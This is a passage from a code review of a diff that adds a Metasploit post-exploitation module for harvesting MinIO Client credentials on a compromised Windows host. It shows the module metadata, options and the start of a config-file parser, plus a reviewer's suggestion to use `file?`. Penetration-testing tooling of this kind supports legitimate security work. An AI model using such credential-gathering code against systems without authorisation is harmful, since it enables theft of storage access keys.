modules/post/windows/gather/credentials/minio_client.rb

```diff
@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# @blurbdust based this code off of https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
+# and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/enum_ms_product_keys.rb
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather MinIO Client Key',
+        'Description' => %q{
+          This is a module that searches for MinIO Client credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://blog.kali-team.cn/Metasploit-MinIO-Client-7d940c60ae8545aeaa29c96536dda855' ]
+        ],
+        'Author' => ['Kali-Team <kali-team[at]qq.com>'],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_railgun_api
+              stdapi_railgun_api_multi
+              stdapi_railgun_memread
+              stdapi_railgun_memwrite
+              stdapi_sys_process_get_processes
+            ]
+          }
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('CONFIG_PATH', [ false, 'Specifies the config file path for MinIO Client']),
+      ]
+    )
+  end
+
+  def parser_minio(config_path)
+    print_status("Parsing file #{config_path}")
+    some_result = Hash.new
+    if session.fs.file.exist?(config_path)
```

Comment:
Using `file?` instead would work on all session types.

```suggestion
    if file?(config_path)
```